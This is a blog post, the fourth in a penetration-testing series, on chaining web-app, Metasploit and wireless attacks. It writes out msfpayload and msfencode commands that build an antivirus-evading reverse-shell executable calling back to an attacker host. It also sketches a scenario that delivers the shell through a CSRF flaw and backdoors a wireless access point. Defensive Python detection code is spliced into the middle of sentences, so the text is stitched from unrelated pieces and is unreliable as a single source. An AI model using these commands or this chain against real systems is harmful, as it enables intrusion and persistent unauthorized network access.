Tuesday, 11 February 2014

Hello guys, let's continue the pen testing series. We have already covered 3 parts; now let's cover part 4.

Point of Focus

Let’s build on the concept of combined testing

We’ll discuss useful new tools and techniques
  • In Part 1, the flow was 1) wireless 2) web app 3) network
  • In Part 2, the flow was 1) network 2) wireless 3) web app
  • To illustrate the pragmatic and iterative nature of combined tests, we’ll alter the order this time:
1) Web App attack – Discovery and exploitation (Ratproxy, Yokoso!)
2) Network exploitation – Useful Metasploit features (msfpayload, msfencode, multi-encode options for dodging Anti-Virus)
3) Wireless attack – Wireless Geo-location, GeoWig, and “Ghost in the AP” techniques

Web App Attacks 


Ratproxy: Passive Interception Proxy

Ratproxy is a mostly passive scanner
– Active tests can be enabled
  • Designed to proxy traffic and scan for flaws
– Based on the interplay between client and server
  • Focuses on “Web 2.0” flaws
– Includes the ability to decompile and analyze Flash objects
– Was one of the first tools to find Cross-Site Request Forgery (CSRF) flaws well
  • Ratproxy allows us to combine mapping the application with a first pass looking for flaws
  • Efficiency is the key!
– Chaining Ratproxy with other interception proxies that spider the site is one of our tricks


Yokoso! Infrastructure Fingerprinting

Originally designed to be an infrastructure fingerprinter
– Delivered via XSS flaws
  • Contains three parts
– Lists of interesting URIs
– JavaScript code to find those URIs in browser history
– JavaScript code to find those URIs within the target network
  • These parts are usable on compromised machines
– They also come bundled for use within BeEF
  • The project is looking for more help collecting interesting URIs

Network Attack

Packaging an Attack with msfpayload

Use the msfpayload tool in Metasploit 3.X to turn a payload into an EXE
$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 X
  • The X generates an executable
– There are other options, including R, for raw output
  • We could put the payload on a USB token, send it via e-mail, put it on a file share, etc.
– Or, I don’t know… maybe deliver it via CSRF? Just wait…
  • But, won’t an AV tool detect it?
– Perhaps… so let’s encode it to evade detection!

Evading IDS/IPS/AV with msfencode

Metasploit supports encoding exploits and payloads
– In msfconsole, use “show encoders” and “set ENCODER [encoder]”
– Or, you can use the msfencode program to encode a raw payload
  • The latest trunk version supports a -c [N] option, to apply N rounds of encoding
– One of the best encoders for evasion is “x86/shikata_ga_nai”, Japanese for “nothing can be done about it”
$ ./msfpayload windows/shell/reverse_tcp LHOST=[AttackerIPaddr] LPORT=80 R | ./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o payload.exe
  • You need to get Metasploit ready for the inbound connection:
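Seen from the defender's side, the reverse shell built above connects back on TCP port 80 but never speaks HTTP. The following Python is an added example, not from the original slides: it flags long-lived, unidentified TCP sessions on web ports in a constructed subset of Zeek-style conn.log lines (field layout, addresses and the 60-second threshold are assumptions).

```python
"""Flag reverse shells hiding on web ports in Zeek-style conn logs."""
from dataclasses import dataclass

# Service a protocol analyzer is expected to identify on each web port
WEB_PORTS = {80: "http", 443: "ssl"}

@dataclass
class Conn:
    orig_h: str
    orig_p: int
    resp_h: str
    resp_p: int
    proto: str
    service: str
    duration: float
    resp_bytes: int

def parse_conn_line(line: str) -> Conn:
    # Constructed subset of conn.log fields, tab separated:
    # ts uid id.orig_h id.orig_p id.resp_h id.resp_p proto service duration orig_bytes resp_bytes
    f = line.rstrip("\n").split("\t")
    duration = 0.0 if f[8] == "-" else float(f[8])
    return Conn(f[2], int(f[3]), f[4], int(f[5]), f[6], f[7], duration, int(f[10]))

def is_suspicious(c: Conn, min_duration: float = 60.0) -> bool:
    expected = WEB_PORTS.get(c.resp_p)
    if c.proto != "tcp" or expected is None:
        return False
    # Zeek leaves service as "-" when no analyzer matched the stream; a staged
    # reverse_tcp session on port 80 is long-lived and carries no HTTP at all.
    return c.service != expected and c.duration >= min_duration

def find_suspicious(log: str) -> list:
    conns = (parse_conn_line(l) for l in log.splitlines() if l and not l.startswith("#"))
    return [c for c in conns if is_suspicious(c)]

# Constructed sample: line 2 is a 30-minute unidentified session to port 80 that
# first pulled ~900 KB from the "server" (the stage); line 4 is a short failed connect.
SAMPLE_LOG = """\
1392100000.1\tC1\t10.1.1.20\t51022\t203.0.113.10\t80\ttcp\thttp\t0.8\t412\t9314
1392100010.5\tC2\t10.1.1.20\t51040\t198.51.100.7\t80\ttcp\t-\t1843.2\t6120\t901400
1392100020.0\tC3\t10.1.1.33\t51101\t203.0.113.10\t443\ttcp\tssl\t12.0\t2200\t40100
1392100030.0\tC4\t10.1.1.33\t51102\t198.51.100.7\t80\ttcp\t-\t0.3\t0\t0
"""
```

Only the second sample line is returned; the port-443 session is identified as ssl and the short failed connect never reaches the duration threshold.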

Wireless Attacks 

Wireless Geo-Location

Question: Where is the client device I have just exploited?
– IP address information can be misleading (VPN, static, internal networks)
– iPhone pseudo-GPS uses nearby Wi-Fi and cellular towers for location analysis
  • Not enough integrated GSM/EV-DO interfaces to use cell tower locations
  • Wi-Fi device location database available with the Wireless Geographic Logging Engine
– www.wigle.net, inspired by wardrivers!

What Networks Are Nearby?

Vista and OS X provide command-line tools for network discovery (no love for XP).


WiGLE Search


Tool: GeoWig

Automates searching WiGLE for BSSIDs
  • Heuristics to identify APs with similar MAC addresses
– Common in corporate WLAN deployments



Ghost in the AP

Compromised APs provide tremendous value in a pen test
  • Leveraged as a network backdoor
– Configure additional virtual SSIDs
– Cloaked SSID with an authorized (or similar) MAC address (may go unnoticed)
  • Attacker can target any VLAN accessible to the compromised AP!
  • Cisco Aironet device as an example; applies to many device manufacturers
Dubious Configuration
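As an added defender's-side example, not from the original slides: the similar-MAC heuristic GeoWig relies on, applied to a constructed BSSID inventory and survey list, also surfaces the cloaked extra SSID a “Ghost in the AP” would add right next to an authorized BSSID. The data, the OUI grouping and the max_gap threshold are all assumptions.

```python
"""Cluster BSSIDs that look like one WLAN deployment and flag unexpected neighbours."""
from collections import defaultdict

def mac_to_int(mac: str) -> int:
    return int(mac.replace(":", "").replace("-", ""), 16)

def normalize(mac: str) -> str:
    return mac.upper().replace("-", ":")

def cluster_bssids(bssids, max_gap: int = 16):
    """Per OUI, chain addresses whose numeric distance is at most max_gap.
    Corporate APs and the virtual SSIDs on one radio usually draw BSSIDs from
    one OUI in a contiguous range, which is the similar-MAC heuristic."""
    by_oui = defaultdict(list)
    for b in {normalize(b) for b in bssids}:
        by_oui[b[:8]].append(b)
    clusters = []
    for group in by_oui.values():
        group.sort(key=mac_to_int)
        current = [group[0]]
        for prev, cur in zip(group, group[1:]):
            if mac_to_int(cur) - mac_to_int(prev) <= max_gap:
                current.append(cur)
            else:
                clusters.append(current)
                current = [cur]
        clusters.append(current)
    return clusters

def unexpected_neighbours(observed, authorized, max_gap: int = 16):
    """BSSIDs seen close to an inventoried AP but absent from the inventory:
    the shape a cloaked extra SSID on a compromised AP would take."""
    auth = {normalize(b) for b in authorized}
    flagged = []
    for cluster in cluster_bssids(list(auth) + list(observed), max_gap):
        if any(b in auth for b in cluster):
            flagged.extend(b for b in cluster if b not in auth)
    return sorted(flagged)

# Constructed inventory and survey data (not real deployments)
AUTHORIZED = ["00:1A:2B:3C:4D:00", "00:1A:2B:3C:4D:10", "00:1A:2B:3C:4D:20"]
OBSERVED = ["00:1a:2b:3c:4d:00",   # inventoried AP, lower case from a survey tool
            "00:1A:2B:3C:4D:01",   # extra BSSID on the same radio, not inventoried
            "00:1A:2B:3C:4D:10",
            "00:1A:2B:3C:99:00",   # same vendor, far away: a different deployment
            "F0:9F:C2:11:22:33"]   # neighbour's home router, other OUI
```

Running unexpected_neighbours(OBSERVED, AUTHORIZED) returns only 00:1A:2B:3C:4D:01; the same-vendor address far down the range and the foreign-OUI router form their own clusters and are left alone.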


A Scenario - Example for you

1) Analyze Website with Ratproxy… Find CSRF Flaw
2) Build AV-Dodging Payload & Place It on the On-Load CSRF Trigger
3) Get Victim to Access CSRF, Making Browser Load Content
4) Other Victim Accesses Content, Running Reverse Shell
5) Use GeoWig to Verify In-Scope & Use Yokoso! to Admin Devices
6) Attack AP and Implement “Ghost in the AP”

Uf, man, this is getting quite long. Hold on, a very few left.

7) Access Target Network from Virtual AP & Attack Servers

So at last we did it. That is it. Let's conclude with some points for you at the end.

Combined attack vectors allow for far deeper penetration into most target networks than separate vectors
– Combining web app, network, and wireless penetration testing is very powerful
  • This combination provides a much more accurate view of the business risks posed by vulnerabilities than completely separate network, wireless, and web app tests.

OK then, see you. Take care, buddies. Thanks for visiting. Have a nice time.
